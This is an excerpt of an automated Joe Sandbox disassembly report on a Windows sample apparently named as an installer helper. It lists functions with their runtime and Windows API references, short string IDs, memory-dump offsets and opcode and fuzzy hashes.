                              • Opcode ID: c9686be9ac01619b63fc2ae23d9a7a687838f829b19745f25ef881f1f98080f6
                              • Instruction ID: 94688bf5afd8e631c418835614d505d86386b094005f48138ad1c0856650025f
                              • Opcode Fuzzy Hash: c9686be9ac01619b63fc2ae23d9a7a687838f829b19745f25ef881f1f98080f6
                              • Instruction Fuzzy Hash: 16F01C32A0162DFBDF029B95CD0DF9FBA79EB4576BFA14064FC05A2590CB748A10DA90
                              Function 6C227327 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog3.LIBCMT ref: 6C22732E
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C227339
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C2273A7
                                • Part of subcall function 6C227230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C227248
                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C227354
                              • _Yarn.LIBCPMT ref: 6C22736A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                              • String ID:
                              • API String ID: 1088826258-0
                              • Opcode ID: 50b7951dfa97f7a28b0ad2ca3a906a68867f03e08744acebb6fc8789035623bf
                              • Instruction ID: 9c41096ac4a2e5e8beb8f7b7d56a34f4391667122776bf6a45ea36ffd3e60b31
                              • Opcode Fuzzy Hash: 50b7951dfa97f7a28b0ad2ca3a906a68867f03e08744acebb6fc8789035623bf
                              • Instruction Fuzzy Hash: 5E017C76A045199BDF05DF64C8409BD77B6FF86654B15400DDC1297780CF3CAA46CBD1
                              Function 6C2A6E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: 0852cba66617b4ad5f3c070bf29e5fb9591e074b2bca5d524c5b2c36a0b60d19
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: 33126A7490124EDFCB04CFE9C4D0ADEBBB1BF08709F14806AE845ABB55DB30A946CB64
                              Function 6C272B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: cf31401208169d7f73caa1ce93ec14dd9542b8738f130f6a2f2fb64b8c248136
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: 30B11AB5D0020ADFCB24CF99C9C49AEBBB5FF48315F60852EE855A7B50D730AA45CB60
                              Function 6C0F2020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 6C227327: __EH_prolog3.LIBCMT ref: 6C22732E
                                • Part of subcall function 6C227327: std::_Lockit::_Lockit.LIBCPMT ref: 6C227339
                                • Part of subcall function 6C227327: std::locale::_Setgloballocale.LIBCPMT ref: 6C227354
                                • Part of subcall function 6C227327: _Yarn.LIBCPMT ref: 6C22736A
                                • Part of subcall function 6C227327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C2273A7
                                • Part of subcall function 6C0F2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2F95
                                • Part of subcall function 6C0F2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2FAF
                                • Part of subcall function 6C0F2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F2FD0
                                • Part of subcall function 6C0F2F60: __Getctype.LIBCPMT ref: 6C0F3084
                                • Part of subcall function 6C0F2F60: std::_Facet_Register.LIBCPMT ref: 6C0F309C
                                • Part of subcall function 6C0F2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F30B7
                              • std::ios_base::_Addstd.LIBCPMT ref: 6C0F211B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 3332196525-1866435925
                              • Opcode ID: b3413aa4c9498a80ac0f13f709c180714c21a3fb069f3bcd5d99908e57967d78
                              • Instruction ID: 3377c88ea592a8ed2979d1231c45679374865ceab2655d481c73bbf62e78e3be
                              • Opcode Fuzzy Hash: b3413aa4c9498a80ac0f13f709c180714c21a3fb069f3bcd5d99908e57967d78
                              • Instruction Fuzzy Hash: BB41B3B1E003499FDB00CF64C84579ABBF0FF44318F144268E915AB791E7759985CB90
                              Function 6C2761D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $CK$CK
                              • API String ID: 3519838083-2957773085
                              • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction ID: 00e9367fc465782532805842bb7c745a7bfda6ebeecc60395f3b219e36b49f95
                              • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction Fuzzy Hash: 67219070E4120A8BDB64DFE8C4D05EEF7B6FB94304F54462AC822E7B91C7744A068AA0
                              Function 6C28D584 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0$LrJ$x
                              • API String ID: 3519838083-658305261
                              • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                              • Instruction ID: fac0486a05e6e06176fa62713170718ee34fc5693a4ee88373edeab1a14a9c62
                              • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                              • Instruction Fuzzy Hash: 84218076D0211E9ACF04DBD4C980AEEB7B5EF58309F60005BE801B3680DB755E1DCBA1
                              Function 6C284EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C284ECC
                                • Part of subcall function 6C26F58A: __EH_prolog.LIBCMT ref: 6C26F58F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: cf0cbb7d3cb5c20de6b553e90db13834feec9b71a8872870e1263b4b0068dcc2
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: FD21C6B0801B44CFC760CF6AC14429ABBF4BF29708B40895EC4AA97B11D7B8A648CF55
                              Function 6C23AD90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C23B0D0,6C0F1DEA,00008000,6C23B0D0,?,?,?,6C23AC7F,6C23B0D0,?,00000000,6C0F1DEA), ref: 6C23ADC9
                              • GetLastError.KERNEL32(?,?,?,6C23AC7F,6C23B0D0,?,00000000,6C0F1DEA,?,6C24469E,6C23B0D0,000000FF,000000FF,00000002,00008000,6C23B0D0), ref: 6C23ADD3
                              • __dosmaperr.LIBCMT ref: 6C23ADDA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer__dosmaperr
                              • String ID: 8Q
                              • API String ID: 2336955059-4022487301
                              • Opcode ID: c25f483b4d13d8bf91357b8373009da1805d35d5384d3892c09da59d7be10fa9
                              • Instruction ID: 468170f935b7dabe20929fe85c3bd3fc3ba66ffdccce94b7dc90502ef68e0451
                              • Opcode Fuzzy Hash: c25f483b4d13d8bf91357b8373009da1805d35d5384d3892c09da59d7be10fa9
                              • Instruction Fuzzy Hash: 2A01287771152DAFCF058FAACC05CDE3B29EB863267240218FC15972C0EA70D9018B90
                              Function 6C226AFD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                              Download Yara Rule
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C32466C,?,652EF5AA,6C0F230E,6C32430C), ref: 6C226B07
                              • ReleaseSRWLockExclusive.KERNEL32(6C32466C), ref: 6C226B3A
                              • WakeAllConditionVariable.KERNEL32(6C324668), ref: 6C226B45
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                              • String ID: lF2l
                              • API String ID: 1466638765-2379685847
                              • Opcode ID: 253810d785cfd7e8ec3899a6c1b7d81c8d48ad18dcd9deb75401557908ad7430
                              • Instruction ID: 13b60c26461d604474dc5a6c4312360efe58d04415541f7fc582a85446b02e4d
                              • Opcode Fuzzy Hash: 253810d785cfd7e8ec3899a6c1b7d81c8d48ad18dcd9deb75401557908ad7430
                              • Instruction Fuzzy Hash: EBF03978A01500DFCF05EF59E848D95BBBCEB4A711B0180AEFD0687740CB38A911CFA4
                              Function 6C27BD0E Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: <J$DJ$HJ$TJ$]
                              • API String ID: 0-686860805
                              • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction ID: 83f4ae15368114be6222d4a81eb9c5747d8c02f5399462c802959c41f1b8f890
                              • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction Fuzzy Hash: 3A418574C0528DAFCF24DBA1D4D0CEEB770AF15308BA0816DE92167E51EB35A65DCB21
                              Function 6C276331 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction ID: d8765c41025ebe18244a0bca83a0d00029e4e2c7c60f5635634df68313811aef
                              • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction Fuzzy Hash: 6D1181B620024CBEEB314AA4CC84EABBBB9EF85B44F10841DF95156A50CA71AC05D730
                              Function 6C2349B2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,?,6C22EF64,6C256DD8,0000000C), ref: 6C2349B7
                              • _free.LIBCMT ref: 6C234A14
                              • _free.LIBCMT ref: 6C234A4A
                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C22EF64,6C256DD8,0000000C), ref: 6C234A55
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 25ae3816dbc91cb4110e442c1af4eaa14fb56559cc372c3b8bd714b6b21a4b01
                              • Instruction ID: ae3ade90dee2358f90727019f1efaae5bbff113706958ea4aaf10bd0faab6e16
                              • Opcode Fuzzy Hash: 25ae3816dbc91cb4110e442c1af4eaa14fb56559cc372c3b8bd714b6b21a4b01
                              • Instruction Fuzzy Hash: 8A11E7F23041296BDE005AB95CC8D5A3B6DEBC277D7252769FD2CA2BC0DF368C094528
                              Function 6C245EBA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • WriteConsoleW.KERNEL32(00000000,?,6C2446EC,00000000,00000000,?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0), ref: 6C245ED1
                              • GetLastError.KERNEL32(?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?,6C23B0D0,?,6C23BD1C,6C245AB6), ref: 6C245EDD
                                • Part of subcall function 6C245F2E: CloseHandle.KERNEL32(FFFFFFFE,6C245EED,?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?,6C23B0D0), ref: 6C245F3E
                              • ___initconout.LIBCMT ref: 6C245EED
                                • Part of subcall function 6C245F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C245EAB,6C244B3E,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?), ref: 6C245F22
                              • WriteConsoleW.KERNEL32(00000000,?,6C2446EC,00000000,?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?), ref: 6C245F02
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 206263c66f9381500dd205cdbe3cb923e010c7983bc129b1bc9a0d814e796d6e
                              • Instruction ID: 23db9cea9f3ce4aa0ea8ab30a91abef84afee3c527b33261d501f331a85ea984
                              • Opcode Fuzzy Hash: 206263c66f9381500dd205cdbe3cb923e010c7983bc129b1bc9a0d814e796d6e
                              • Instruction Fuzzy Hash: 2CF03737500119BBCF121FA1DC089CA7F76FF06761B058024FE5985160CB328C24DB91
                              Function 6C25E072 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 398COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C25E077
                                • Part of subcall function 6C25DFF5: __EH_prolog.LIBCMT ref: 6C25DFFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :$\
                              • API String ID: 3519838083-1166558509
                              • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction ID: 8faa55f7af8285ecc6c54ff0765747330e0c2d9bf32e1c93ca72f5f9c94220d1
                              • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction Fuzzy Hash: 86E1C27090020EDACF11DFA4C590BEFB7B1AF0531CF908119EC55A7B90EB79A969CB91
                              Function 6C2AA354 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 234COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog__aullrem
                              • String ID: d%K
                              • API String ID: 3415659256-3110269457
                              • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                              • Instruction ID: a6473eda6048e3a83026278805547db3bec26bc006ed3c729177618745f540f3
                              • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                              • Instruction Fuzzy Hash: 4981AC71A0120EDFDB01CF94C484BAEB7F5AF4434AF248069EC19ABA41D771D90ACFA4
                              Function 6C233124 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog3_
                              • String ID: 8Q
                              • API String ID: 2427045233-4022487301
                              • Opcode ID: 35e413f186f6e2f2ff3432f68761e1d2188ac7eec3ea4108b9eb42068a33f480
                              • Instruction ID: 5922fc2e3a1115233c442874fbc6512c23cce8bf706d7c622560c17e5d30692e
                              • Opcode Fuzzy Hash: 35e413f186f6e2f2ff3432f68761e1d2188ac7eec3ea4108b9eb42068a33f480
                              • Instruction Fuzzy Hash: 5E71C7B1D0122E9FDB108F96C880AEE7B75BF05319F14A215FC186BA50DF758A47C7A0
                              Function 6C283C20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$hfJ
                              • API String ID: 3519838083-1391159562
                              • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction ID: 7d1eb2480cea2c4907ec45228e91ccd5ddfc52fca25b5ea94e70a08cdf806520
                              • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction Fuzzy Hash: 6191297091124DEFCB20DFA9C8949DEFBF4BF18308F54451EE956A7A90D770AA48CB21
                              Function 6C278C58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C278C5D
                                • Part of subcall function 6C27761A: __EH_prolog.LIBCMT ref: 6C27761F
                                • Part of subcall function 6C277A2E: __EH_prolog.LIBCMT ref: 6C277A33
                                • Part of subcall function 6C278EA5: __EH_prolog.LIBCMT ref: 6C278EAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: 19c5c596d3511dd0c32a534cabd10e50646632358cb5e332081079bf21afe786
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
